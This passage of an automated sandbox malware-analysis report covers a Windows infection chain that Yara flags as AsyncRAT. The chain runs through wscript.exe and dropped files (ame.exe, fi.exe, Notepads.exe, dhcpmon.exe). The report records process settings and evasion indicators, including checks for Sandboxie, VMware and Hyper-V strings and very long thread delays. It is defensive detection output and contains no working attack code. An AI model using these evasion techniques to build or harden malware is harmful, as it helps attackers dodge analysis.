            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Notepads.exeBinary or memory string: SBIEDLL.DLL
            Source: wscript.exe, 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, ame.exe, 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Notepads.exe, 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Notepads.exe.3.drBinary or memory string: SBIEDLL.DLLME: CHAT
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\ame.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\fi.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Notepads.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Local\Temp\fi.exeWindow / User API: foregroundWindowGot 933
            Source: C:\Users\user\AppData\Local\Temp\ame.exe TID: 6628Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6724Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6692Thread sleep time: -200000s >= -30000s
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6984Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Notepads.exe TID: 3000Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Notepads.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_02340D66 GetSystemInfo,
            Source: C:\Users\user\AppData\Local\Temp\ame.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\fi.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Notepads.exeThread delayed: delay time: 922337203685477
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipes6
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
            Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes[
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor.
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.594189844.000000000150C000.00000004.00000020.sdmp, Notepads.exe, 0000001E.00000002.575946515.0000000001378000.00000004.00000020.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition~
            Source: Notepads.exe, 0000001E.00000002.587730266.000000001BF61000.00000004.00000001.sdmpBinary or memory string: &Hyper-V Hypervisorw
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: Notepads.exe, 0000001A.00000003.562811005.000000001BFAF000.00000004.00000001.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipesk|
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmpBinary or memory string: &Hyper-V Hypervisor
            Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipesx
            Source: Notepads.exe, 0000001A.00000002.603514623.000000001C841000.00000004.00000001.sdmpBinary or memory string: % Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186P
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes:
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes*
            Source: ame.exe, 00000003.00000003.526302917.000000001B2B7000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
            Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: *Hyper-V Virtual Machine Bus Provider Pipes
            Source: ame.exe, 00000003.00000002.555441828.000000001C01C000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipes[
            Source: Notepads.exe.3.drBinary or memory string: vmware
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus]
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
            Source: ame.exe, 00000003.00000003.526156092.000000001C056000.00000004.00000001.sdmpBinary or memory string: st Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
            Source: Notepads.exe, 0000001A.00000003.562007200.000000001C859000.00000004.00000001.sdmpBinary or memory string: lows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual 